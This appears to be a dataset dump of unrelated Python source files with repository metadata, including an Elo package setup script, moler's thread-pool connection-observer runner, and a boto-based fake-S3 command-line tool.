8a0ac0d22efedb04ad9d5a3e84555805e4304b88 | 453 | py | Python | setup.py | Kraktoos/Python-Elo-System | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | 2 | 2021-10-20T18:35:59.000Z | 2021-10-31T19:56:36.000Z | setup.py | Kraktoos/elo_system | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | null | null | null | setup.py | Kraktoos/elo_system | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | 1 | 2022-02-08T13:58:10.000Z | 2022-02-08T13:58:10.000Z |
from setuptools import setup
setup(name="elo_system",
version="1.0",
description="Yet another Python Implementation of the Elo rating system.",
long_description="""
Yet another Python Implementation of the Elo rating system.
""",
author="Kraktoos",
author_email="kraktoos@gmail.com",
url="https://github.com/Kraktoos/elo_system",
include_package_data=True,
license="MIT",
)
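The package above describes itself as an Elo rating implementation. As a generic sketch of the underlying math (an illustration of the standard Elo update, not elo_system's actual API):

```python
# Generic sketch of the standard Elo update such a package implements;
# not elo_system's actual interface.
def elo_update(rating_a, rating_b, score_a, k=32):
    """Return new ratings after one game; score_a is 1 (win), 0.5 (draw) or 0 (loss)."""
    expected_a = 1 / (1 + 10 ** ((rating_b - rating_a) / 400))
    change = k * (score_a - expected_a)
    return rating_a + change, rating_b - change

print(elo_update(1200, 1200, 1))  # -> (1216.0, 1184.0)
```

With equal ratings the expected score is 0.5, so a win moves each player by k/2 points, and the total rating pool stays constant.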
8a0ed597d40b8e2adc03dbad797c60dcb28ef47e | 165 | py | Python | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 5 | 2016-01-12T15:12:18.000Z | 2022-02-10T21:57:39.000Z | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 5 | 2015-01-20T04:22:50.000Z | 2018-10-02T19:39:12.000Z | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 1 | 2022-03-04T06:49:39.000Z | 2022-03-04T06:49:39.000Z |
from PWMparser import uniProbe_parse  # import only what is used instead of '*'

t = open("/home/hsuj/Downloads/All_PWMs/SCI09/Gcm1_pwm_primary.txt", 'r')  # 'rU' mode was removed in Python 3.11
index, matrix, size = uniProbe_parse(t)
t.close()
print(matrix)
print(size)
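`uniProbe_parse` comes from PWMparser, which is not shown here. A hypothetical sketch of what a uniPROBE-style PWM reader might do (the real format handled by PWMparser may differ):

```python
# Hypothetical reader for a uniPROBE-style PWM, where each line holds one base
# row such as "A:\t0.1\t0.7". The actual format parsed by PWMparser may differ.
def parse_pwm(lines):
    matrix = {}
    for line in lines:
        if ':' not in line:
            continue  # skip headers/blank lines
        base, values = line.split(':', 1)
        matrix[base.strip()] = [float(v) for v in values.split()]
    size = len(next(iter(matrix.values()))) if matrix else 0
    return matrix, size

pwm, width = parse_pwm(["A:\t0.1\t0.7", "C:\t0.9\t0.3"])
print(width)  # -> 2
```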
8a14e3fa81291ae479bb2f7e62317024325cab7b | 515 | py | Python | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 6 | 2018-03-06T10:16:36.000Z | 2021-12-05T12:43:10.000Z | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-03-06T10:27:08.000Z | 2022-01-02T15:21:27.000Z | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-01-06T16:28:31.000Z | 2018-09-17T19:47:19.000Z |
"""Get user info API method."""
from ibsng.handler.handler import Handler
class getUserInfo(Handler):
"""Get user info method class."""
def control(self):
"""Validate inputs after setup method.
:return: None
:rtype: None
"""
self.is_valid(self.username, str)
def setup(self, username):
"""Setup required parameters.
:param str username: ibsng username
:return: None
:rtype: None
"""
self.username = username
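The class above follows a setup()/control() lifecycle provided by the ibsng Handler base class. A minimal mock illustrating that flow (the real Handler's `is_valid()` signature is assumed here, not verified):

```python
# Minimal mock of the Handler lifecycle used above. The real ibsng Handler
# supplies is_valid(); this stand-in only assumes its (value, type) signature.
class MockHandler:
    def is_valid(self, value, expected_type):
        if not isinstance(value, expected_type):
            raise TypeError("expected {}".format(expected_type.__name__))

class GetUserInfoSketch(MockHandler):
    def setup(self, username):
        # store parameters first ...
        self.username = username

    def control(self):
        # ... then validate them, mirroring the class above
        self.is_valid(self.username, str)

handler = GetUserInfoSketch()
handler.setup("alice")
handler.control()  # passes; setup(42) would make control() raise TypeError
```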
8a1b7b3c2132b2942cc3026e54b6189a4e0cfd8d | 267 | py | Python | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null |
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import *
# import everything from the tkinter module
root = Tk()
entry = Entry(root)  # renamed from 'input' to avoid shadowing the builtin
entry.pack(padx=200, pady=200)
entry.delete(0, END)  # clear any existing text first, by index
entry.insert(0, "Please enter content...")
root.mainloop()
8a27081321f363187f7d307940bfea675bffcedc | 32,556 | py | Python | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | 2 | 2021-03-14T15:17:10.000Z | 2021-03-15T07:12:12.000Z | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | null | null | null | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2018-2020 Nokia
"""
Runner abstraction goal is to hide concurrency machinery used
to make it exchangeable (threads, asyncio, twisted, curio)
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import atexit
import concurrent.futures
import logging
import threading
import time
from abc import abstractmethod, ABCMeta
from concurrent.futures import ThreadPoolExecutor, wait
from functools import partial
from six import add_metaclass
from moler.exceptions import CommandTimeout
from moler.exceptions import ConnectionObserverTimeout
from moler.exceptions import MolerException
from moler.exceptions import CommandFailure
from moler.util.loghelper import log_into_logger
@add_metaclass(ABCMeta)
class ConnectionObserverRunner(object):
@abstractmethod
def shutdown(self):
"""Cleanup used resources."""
@abstractmethod
def submit(self, connection_observer):
"""
Submit connection observer to background execution.
Returns Future that could be used to await for connection_observer done.
"""
@abstractmethod
def wait_for(self, connection_observer, connection_observer_future, timeout=10.0):
"""
Await for connection_observer running in background or timeout.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:param timeout: Max time (in float seconds) you want to await before you give up.
:return:
"""
@abstractmethod
def wait_for_iterator(self, connection_observer, connection_observer_future):
"""
Version of wait_for() intended to be used by Python3 to implement iterable/awaitable object.
Note: we don't have timeout parameter here. If you want to await with timeout please do use timeout machinery
of selected parallelism.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:return: iterator
"""
@abstractmethod
def feed(self, connection_observer):
"""
Feeds connection_observer with data to let it become done.
This is a place where runner is a glue between words of connection and connection-observer.
Should be called from background-processing of connection observer.
"""
@abstractmethod
def timeout_change(self, timedelta):
"""
Call this method to notify runner that timeout has been changed in observer
:param timedelta: delta timeout in float seconds
:return: None
"""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
return False # exceptions (if any) should be reraised
def time_out_observer(connection_observer, timeout, passed_time, runner_logger, kind="background_run"):
"""Set connection_observer status to timed-out"""
if not connection_observer.life_status.was_on_timeout_called:
connection_observer.life_status.was_on_timeout_called = True
if not connection_observer.done():
if hasattr(connection_observer, "command_string"):
exception = CommandTimeout(connection_observer=connection_observer,
timeout=timeout, kind=kind, passed_time=passed_time)
else:
exception = ConnectionObserverTimeout(connection_observer=connection_observer,
timeout=timeout, kind=kind, passed_time=passed_time)
# TODO: secure_data_received() may change status of connection_observer
# TODO: and if secure_data_received() runs inside threaded connection - we have race
connection_observer.set_exception(exception)
connection_observer.on_timeout()
observer_info = "{}.{}".format(connection_observer.__class__.__module__, connection_observer)
timeout_msg = "has timed out after {:.2f} seconds.".format(passed_time)
msg = "{} {}".format(observer_info, timeout_msg)
# levels_to_go_up: extract caller info to log where .time_out_observer has been called from
connection_observer._log(logging.INFO, msg, levels_to_go_up=2)
log_into_logger(runner_logger, level=logging.DEBUG,
msg="{} {}".format(connection_observer, timeout_msg),
levels_to_go_up=1)
def result_for_runners(connection_observer):
"""
When runner takes result from connection-observer it should not
modify ConnectionObserver._not_raised_exceptions
:param connection_observer: observer to get result from
:return: result or raised exception
"""
if connection_observer._exception:
raise connection_observer._exception
return connection_observer.result()
class CancellableFuture(object):
def __init__(self, future, observer_lock, stop_running, is_done, stop_timeout=0.5):
"""
Wrapper to allow cancelling already running concurrent.futures.Future
Assumes that executor submitted function with following parameters
fun(stop_running, is_done)
and that such function correctly handles that events (threading.Event)
:param future: wrapped instance of concurrent.futures.Future
:param stop_running: set externally to finish thread execution of function
:param is_done: set when function finished running in thread
:param stop_timeout: timeout to await is_done after setting stop_running
"""
self._future = future
self.observer_lock = observer_lock # against threads race write-access to observer
self._stop_running = stop_running
self._stop_timeout = stop_timeout
self._is_done = is_done
def __getattr__(self, attr):
"""Make it proxy to embedded future"""
attribute = getattr(self._future, attr)
return attribute
def __str__(self):
"""Make it proxy to embedded future"""
f_str = str(self._future)
return "CancellableFuture({})".format(f_str)
def cancel(self, no_wait=False):
"""
Cancel embedded future
:param no_wait: if True - just set self._stop_running event to let thread exit loop
:return:
"""
if self.running():
self._stop(no_wait)
if no_wait:
return True
# after exiting threaded-function future.state == FINISHED
# we need to change it to PENDING to allow for correct cancel via concurrent.futures.Future
with self._condition:
self._future._state = concurrent.futures._base.PENDING
return self._future.cancel()
def _stop(self, no_wait=False):
self._stop_running.set() # force threaded-function to exit
if no_wait:
return
if not self._is_done.wait(timeout=self._stop_timeout):
err_msg = "Failed to stop thread-running function within {} sec".format(self._stop_timeout)
# TODO: should we break current thread or just set this exception inside connection-observer
            # (is it symmetric to failed-start?)
# may cause leaking resources - no call to moler_conn.unsubscribe()
raise MolerException(err_msg)
class ThreadPoolExecutorRunner(ConnectionObserverRunner):
def __init__(self, executor=None):
"""Create instance of ThreadPoolExecutorRunner class"""
self._tick = 0.005 # Tick for sleep or partial timeout
self._in_shutdown = False
self._i_own_executor = False
self._was_timeout_called = False
self.executor = executor
self.logger = logging.getLogger('moler.runner.thread-pool')
self.logger.debug("created")
atexit.register(self.shutdown)
if executor is None:
max_workers = 1000 # max 1000 threads in pool
try: # concurrent.futures v.3.2.0 introduced prefix we like :-)
self.executor = ThreadPoolExecutor(max_workers=max_workers, thread_name_prefix='ThrdPoolRunner')
except TypeError as exc:
if ('unexpected' in str(exc)) and ('thread_name_prefix' in str(exc)):
self.executor = ThreadPoolExecutor(max_workers=max_workers)
else:
raise
self.logger.debug("created own executor {!r}".format(self.executor))
self._i_own_executor = True
else:
self.logger.debug("reusing provided executor {!r}".format(self.executor))
def shutdown(self):
self.logger.debug("shutting down")
self._in_shutdown = True # will exit from feed() without stopping executor (since others may still use that executor)
if self._i_own_executor:
self.executor.shutdown() # also stop executor since only I use it
def submit(self, connection_observer):
"""
Submit connection observer to background execution.
Returns Future that could be used to await for connection_observer done.
"""
assert connection_observer.life_status.start_time > 0.0 # connection-observer lifetime should already been
# started
observer_timeout = connection_observer.timeout
remain_time, msg = his_remaining_time("remaining", timeout=observer_timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("go background: {!r} - {}".format(connection_observer, msg))
# TODO: check dependency - connection_observer.connection
# Our submit consists of two steps:
# 1. _start_feeding() which establishes data path from connection to observer
# 2. scheduling "background feed" via executor.submit()
#
# By using the code of _start_feeding() we ensure that after submit() connection data could reach
# data_received() of observer - as it would be "virtually running in background"
# Another words, no data will be lost-for-observer between runner.submit() and runner.feed() really running
#
# We do not await here (before returning from submit()) for "background feed" to be really started.
# That is in sync with generic nature of threading.Thread - after thread.start() we do not have
# running thread - it is user responsibility to await for threads switch.
# User may check "if thread is running" via Thread.is_alive() API.
# For concurrent.futures same is done via future.running() API.
#
# However, lifetime of connection_observer starts in connection_observer.start().
# It gains it's own timer so that timeout is calculated from that connection_observer.life_status.start_time
# That lifetime may start even before this submit() if observer is command and we have commands queue.
#
# As a corner case runner.wait_for() may timeout before feeding thread has started.
stop_feeding = threading.Event()
feed_done = threading.Event()
observer_lock = threading.Lock() # against threads race write-access to observer
subscribed_data_receiver = self._start_feeding(connection_observer, observer_lock)
connection_observer_future = self.executor.submit(self.feed, connection_observer,
subscribed_data_receiver,
stop_feeding, feed_done, observer_lock)
if connection_observer_future.done():
# most probably we have some exception during submit(); it should be stored inside future
try:
too_early_result = connection_observer_future.result()
err_msg = "PROBLEM: future returned {} already in runner.submit()".format(too_early_result)
self.logger.debug("go background: {} - {}".format(connection_observer, err_msg))
except Exception as err:
err_msg = "PROBLEM: future raised {!r} during runner.submit()".format(err)
self.logger.warning("go background: {} - {}".format(connection_observer, err_msg))
self.logger.exception(err_msg)
raise
finalizer = partial(self._feed_finish_callback,
connection_observer=connection_observer,
subscribed_data_receiver=subscribed_data_receiver,
feed_done=feed_done, observer_lock=observer_lock)
connection_observer_future.add_done_callback(finalizer)
c_future = CancellableFuture(connection_observer_future, observer_lock,
stop_feeding, feed_done)
connection_observer.life_status.last_feed_time = time.time()
return c_future
def wait_for(self, connection_observer, connection_observer_future, timeout=None):
"""
Await for connection_observer running in background or timeout.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:param timeout: Max time (in float seconds) you want to await before you give up. If None then taken from connection_observer
:return:
"""
# TODO: calculate remaining timeout before logging + done(result/exception) info
if connection_observer.done():
# 1. done() might mean "timed out" before future created (future is None)
# Observer lifetime started with its timeout clock so, it might timeout even before
# future created by runner.submit() - may happen for nonempty commands queue
# 2. done() might mean "timed out" before future start
# Observer lifetime started with its timeout clock so, it might timeout even before
# connection_observer_future started - since future's thread might not get control yet
# 3. done() might mean "timed out" before wait_for()
# wait_for() might be called so late after submit() that observer already "timed out"
# 4. done() might mean have result or got exception
# wait_for() might be called so late after submit() that observer already got result/exception
#
# In all above cases we want to stop future if it is still running
self.logger.debug("go foreground: {} is already done".format(connection_observer))
self._cancel_submitted_future(connection_observer, connection_observer_future)
return None
max_timeout = timeout
observer_timeout = connection_observer.timeout
# we count timeout from now if timeout is given; else we use .life.status.start_time and .timeout of observer
start_time = time.time() if max_timeout else connection_observer.life_status.start_time
await_timeout = max_timeout if max_timeout else observer_timeout
if max_timeout:
remain_time, msg = his_remaining_time("await max.", timeout=max_timeout, from_start_time=start_time)
else:
remain_time, msg = his_remaining_time("remaining", timeout=observer_timeout, from_start_time=start_time)
self.logger.debug("go foreground: {} - {}".format(connection_observer, msg))
if connection_observer_future is None:
end_of_life, remain_time = await_future_or_eol(connection_observer, remain_time, start_time, await_timeout,
self.logger)
if end_of_life:
return None
if not self._execute_till_eol(connection_observer=connection_observer,
connection_observer_future=connection_observer_future,
max_timeout=max_timeout,
await_timeout=await_timeout,
remain_time=remain_time):
# code below is to close ConnectionObserver and future objects
self._end_of_life_of_future_and_connection_observer(connection_observer, connection_observer_future)
return None
def _execute_till_eol(self, connection_observer, connection_observer_future, max_timeout, await_timeout,
remain_time):
eol_remain_time = remain_time
# either we wait forced-max-timeout or we check done-status each 0.1sec tick
if eol_remain_time > 0.0:
future = connection_observer_future or connection_observer._future
assert future is not None
if max_timeout:
done, not_done = wait([future], timeout=remain_time)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
self._wait_for_time_out(connection_observer, connection_observer_future,
timeout=await_timeout)
if connection_observer.life_status.terminating_timeout > 0.0:
connection_observer.life_status.in_terminating = True
done, not_done = wait([future], timeout=connection_observer.life_status.terminating_timeout)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
else:
while eol_remain_time > 0.0:
done, not_done = wait([future], timeout=self._tick)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
already_passed = time.time() - connection_observer.life_status.start_time
eol_timeout = connection_observer.timeout + connection_observer.life_status.terminating_timeout
eol_remain_time = eol_timeout - already_passed
timeout = connection_observer.timeout
remain_time = timeout - already_passed
if remain_time <= 0.0:
self._wait_for_time_out(connection_observer, connection_observer_future,
timeout=await_timeout)
if not connection_observer.life_status.in_terminating:
connection_observer.life_status.in_terminating = True
else:
self._wait_for_not_started_connection_observer_is_done(connection_observer=connection_observer)
return False
def _wait_for_not_started_connection_observer_is_done(self, connection_observer):
        # Have to wait till connection_observer is done, within the terminating timeout.
eol_remain_time = connection_observer.life_status.terminating_timeout
start_time = time.time()
while not connection_observer.done() and eol_remain_time > 0.0:
time.sleep(self._tick)
eol_remain_time = start_time + connection_observer.life_status.terminating_timeout - time.time()
def _end_of_life_of_future_and_connection_observer(self, connection_observer, connection_observer_future):
future = connection_observer_future or connection_observer._future
if future:
future.cancel(no_wait=True)
connection_observer.set_end_of_life()
@staticmethod
def _cancel_submitted_future(connection_observer, connection_observer_future):
future = connection_observer_future or connection_observer._future
if future and (not future.done()):
future.cancel(no_wait=True)
def _wait_for_time_out(self, connection_observer, connection_observer_future, timeout):
passed = time.time() - connection_observer.life_status.start_time
future = connection_observer_future or connection_observer._future
if future:
with future.observer_lock:
time_out_observer(connection_observer=connection_observer,
timeout=timeout, passed_time=passed,
runner_logger=self.logger, kind="await_done")
else:
            # sorry, we don't have lock yet (it is created by runner.submit())
time_out_observer(connection_observer=connection_observer,
timeout=timeout, passed_time=passed,
runner_logger=self.logger, kind="await_done")
def wait_for_iterator(self, connection_observer, connection_observer_future):
"""
Version of wait_for() intended to be used by Python3 to implement iterable/awaitable object.
Note: we don't have timeout parameter here. If you want to await with timeout please do use timeout machinery
of selected parallelism.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:return: iterator
"""
while not connection_observer_future.done():
yield None
# return result_for_runners(connection_observer) # May raise too. # Python > 3.3
res = result_for_runners(connection_observer)
raise StopIteration(res) # Python 2 compatibility
def _start_feeding(self, connection_observer, observer_lock):
"""
Start feeding connection_observer by establishing data-channel from connection to observer.
"""
def secure_data_received(data, timestamp):
try:
if connection_observer.done() or self._in_shutdown:
return # even not unsubscribed secure_data_received() won't pass data to done observer
with observer_lock:
connection_observer.data_received(data, timestamp)
connection_observer.life_status.last_feed_time = time.time()
except Exception as exc: # TODO: handling stacktrace
# observers should not raise exceptions during data parsing
# but if they do so - we fix it
with observer_lock:
                    self.logger.warning("Unhandled exception from '{}' caught by runner.".format(connection_observer))
ex_msg = "Unexpected exception from {} caught by runner when processing data >>{}<< at '{}':" \
" >>>{}<<< -> repr: >>>{}<<<".format(connection_observer, data, timestamp, exc, repr(exc))
if connection_observer.is_command():
ex = CommandFailure(command=connection_observer, message=ex_msg)
else:
ex = MolerException(ex_msg)
connection_observer.set_exception(ex)
finally:
if connection_observer.done() and not connection_observer.cancelled():
if connection_observer._exception:
self.logger.debug("{} raised: {!r}".format(connection_observer, connection_observer._exception))
else:
self.logger.debug("{} returned: {}".format(connection_observer, connection_observer._result))
moler_conn = connection_observer.connection
self.logger.debug("subscribing for data {}".format(connection_observer))
with observer_lock:
moler_conn.subscribe(observer=secure_data_received,
connection_closed_handler=connection_observer.connection_closed_handler)
# after subscription we have data path so observer is started
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
connection_observer._log(logging.INFO, "{} started, {}".format(connection_observer.get_long_desc(), msg))
if connection_observer.is_command():
connection_observer.send_command()
return secure_data_received # to know what to unsubscribe
def _stop_feeding(self, connection_observer, subscribed_data_receiver, feed_done, observer_lock):
with observer_lock:
if not feed_done.is_set():
moler_conn = connection_observer.connection
self.logger.debug("unsubscribing {}".format(connection_observer))
moler_conn.unsubscribe(observer=subscribed_data_receiver,
connection_closed_handler=connection_observer.connection_closed_handler)
# after unsubscription we break data path so observer is finished
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
connection_observer._log(logging.INFO,
"{} finished, {}".format(connection_observer.get_short_desc(), msg))
feed_done.set()
def _feed_finish_callback(self, future, connection_observer, subscribed_data_receiver, feed_done, observer_lock):
"""Callback attached to concurrent.futures.Future of submitted feed()"""
self._stop_feeding(connection_observer, subscribed_data_receiver, feed_done, observer_lock)
def feed(self, connection_observer, subscribed_data_receiver, stop_feeding, feed_done,
observer_lock):
"""
Feeds connection_observer by transferring data from connection and passing it to connection_observer.
Should be called from background-processing of connection observer.
"""
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("thread started for {}, {}".format(connection_observer, msg))
if not subscribed_data_receiver:
subscribed_data_receiver = self._start_feeding(connection_observer, observer_lock)
time.sleep(self._tick) # give control back before we start processing
self._feed_loop(connection_observer, stop_feeding, observer_lock)
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("thread finished for {}, {}".format(connection_observer, msg))
self._stop_feeding(connection_observer, subscribed_data_receiver, feed_done, observer_lock)
return None
def _feed_loop(self, connection_observer, stop_feeding, observer_lock):
start_time = connection_observer.life_status.start_time
while True:
if stop_feeding.is_set():
# TODO: should it be renamed to 'cancelled' to be in sync with initial action?
self.logger.debug("stopped {}".format(connection_observer))
break
if connection_observer.done():
self.logger.debug("done {}".format(connection_observer))
break
current_time = time.time()
run_duration = current_time - start_time
# we need to check connection_observer.timeout at each round since timeout may change
# during lifetime of connection_observer
timeout = connection_observer.timeout
if connection_observer.life_status.in_terminating:
timeout = connection_observer.life_status.terminating_timeout
if (timeout is not None) and (run_duration >= timeout):
if connection_observer.life_status.in_terminating:
msg = "{} underlying real command failed to finish during {} seconds. It will be forcefully" \
" terminated".format(connection_observer, timeout)
self.logger.info(msg)
connection_observer.set_end_of_life()
else:
with observer_lock:
time_out_observer(connection_observer,
timeout=connection_observer.timeout,
passed_time=run_duration,
runner_logger=self.logger)
if connection_observer.life_status.terminating_timeout >= 0.0:
start_time = time.time()
connection_observer.life_status.in_terminating = True
else:
break
else:
self._call_on_inactivity(connection_observer=connection_observer, current_time=current_time)
if self._in_shutdown:
self.logger.debug("shutdown so cancelling {}".format(connection_observer))
connection_observer.cancel()
time.sleep(self._tick) # give moler_conn a chance to feed observer
def _call_on_inactivity(self, connection_observer, current_time):
"""
Call on_inactivity on connection_observer if needed.
:param connection_observer: ConnectionObserver object.
:param current_time: current time in seconds.
:return: None
"""
life_status = connection_observer.life_status
if (life_status.inactivity_timeout > 0.0) and (life_status.last_feed_time is not None):
expected_feed_timeout = life_status.last_feed_time + life_status.inactivity_timeout
if current_time > expected_feed_timeout:
connection_observer.on_inactivity()
connection_observer.life_status.last_feed_time = current_time
def timeout_change(self, timedelta):
pass
# utilities to be used by runners
def his_remaining_time(prefix, timeout, from_start_time):
"""
    Calculate the remaining lifetime of an object, given its start time and timeout.
    :param prefix: string to be used inside 'remaining time description'
:param timeout: max lifetime of object
:param from_start_time: start of lifetime for the object
:return: remaining time as float and related description message
"""
already_passed = time.time() - from_start_time
remain_time = timeout - already_passed
if remain_time < 0.0:
remain_time = 0.0
msg = "{} {:.3f} [sec], already passed {:.3f} [sec]".format(prefix, remain_time, already_passed)
return remain_time, msg
def await_future_or_eol(connection_observer, remain_time, start_time, timeout, logger):
# Observer lifetime started with its timeout clock
# but setting connection_observer._future may be delayed by nonempty commands queue.
# In such case we have to wait either for _future or timeout.
end_of_life = False
while (connection_observer._future is None) and (remain_time > 0.0):
time.sleep(0.005)
if connection_observer.done():
logger.debug("{} is done before creating future".format(connection_observer))
end_of_life = True
break
now = time.time()
already_passed = now - start_time
remain_time = timeout - already_passed
observer_lifetime_passed = now - connection_observer.life_status.start_time
remain_observer_lifetime = connection_observer.timeout + connection_observer.life_status.terminating_timeout\
- observer_lifetime_passed
# we timeout on earlier timeout (timeout or connection_observer.timeout)
if remain_observer_lifetime <= 0.0:
remain_time = 0.0
if remain_time <= 0.0:
logger.debug("{} timeout before creating future".format(connection_observer))
return end_of_life, remain_time
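CancellableFuture above relies on a cooperative-stop contract: the submitted function loops until `stop_running` is set and signals `is_done` when it exits. A distilled, generic sketch of that contract (built on concurrent.futures directly, not moler's exact implementation):

```python
# Distilled sketch of the cooperative-cancel contract CancellableFuture wraps:
# the worker polls 'stop_running' and signals 'is_done' on exit.
import threading
import time
from concurrent.futures import ThreadPoolExecutor

def worker(stop_running, is_done):
    try:
        while not stop_running.is_set():
            time.sleep(0.01)  # stand-in for feeding an observer with data
    finally:
        is_done.set()  # always signal, so cancel() can await completion

stop_running, is_done = threading.Event(), threading.Event()
with ThreadPoolExecutor(max_workers=1) as executor:
    future = executor.submit(worker, stop_running, is_done)
    stop_running.set()                # request cooperative cancellation
    assert is_done.wait(timeout=2.0)  # worker acknowledged the stop request
    future.result()                   # re-raises if the worker failed
```

Setting the event instead of killing the thread is what lets `_stop()` bound the shutdown with `_stop_timeout` and raise MolerException when the worker fails to acknowledge in time.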
8a298f59ca511939b6e86c5c2133a7995a173de1 | 112 | py | Python | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | path = input().split("\\")
file = path[-1].split(".")
print(f"File name: {file[0]}\nFile extension: {file[1]}")
| 28 | 57 | 0.589286 | 17 | 112 | 3.882353 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029703 | 0.098214 | 112 | 3 | 58 | 37.333333 | 0.623762 | 0 | 0 | 0 | 0 | 0 | 0.446429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a2da9b7d03fbffad915a30e08e6df6a2100f8a8 | 2,665 | py | Python | test/botocmd.py | Kajabi/fake-s3 | a28139fae48df11e3e21ca2a89df738130ab477e | [
"MIT"
] | 1 | 2022-02-24T05:34:25.000Z | 2022-02-24T05:34:25.000Z | test/botocmd.py | amione/fake-s3 | 2f31a962e8abaa7effe25931f1d2fd35d8a557da | [
"MIT"
] | null | null | null | test/botocmd.py | amione/fake-s3 | 2f31a962e8abaa7effe25931f1d2fd35d8a557da | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# fakes3cmd.py -- an s3cmd-like script that accepts a custom host and portname
import re
import os
from optparse import OptionParser
try:
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
except ImportError:
raise Exception('You must install the boto package for python')
class FakeS3Cmd(object):
COMMANDS = ['mb', 'rb', 'put', ]
def __init__(self, host, port):
self.host = host
self.port = port
self.conn = None
self._connect()
def _connect(self):
print('Connecting: %s:%s' % (self.host, self.port))
self.conn = S3Connection(is_secure=False,
calling_format=OrdinaryCallingFormat(),
aws_access_key_id='',
aws_secret_access_key='',
port=self.port, host=self.host)
@staticmethod
def _parse_uri(path):
match = re.match(r's3://([^/]+)(?:/(.*))?', path, re.I)
# returns (bucket, key)
return match.groups()
def mb(self, path, *args):
if not self.conn:
self._connect()
bucket, _ = self._parse_uri(path)
self.conn.create_bucket(bucket)
print('made bucket: [%s]' % bucket)
def rb(self, path, *args):
if not self.conn:
self._connect()
bucket, _ = self._parse_uri(path)
self.conn.delete_bucket(bucket)
print('removed bucket: [%s]' % bucket)
def put(self, *args):
if not self.conn:
self._connect()
args = list(args)
path = args.pop()
bucket_name, prefix = self._parse_uri(path)
bucket = self.conn.get_bucket(bucket_name)
for src_file in args:
key = Key(bucket)
key.key = os.path.join(prefix, os.path.basename(src_file))
key.set_contents_from_filename(src_file)
print('stored: [%s]' % key.key)
if __name__ == "__main__":
# check for options. TODO: This requires a more verbose help message
# to explain how the positional arguments work.
parser = OptionParser()
parser.add_option("-t", "--host", type="string", default='localhost')
parser.add_option("-p", "--port", type='int', default=80)
o, args = parser.parse_args()
if len(args) < 2:
raise ValueError('you must minimally supply a desired command and s3 uri')
cmd = args.pop(0)
if cmd not in FakeS3Cmd.COMMANDS:
raise ValueError('%s is not a valid command' % cmd)
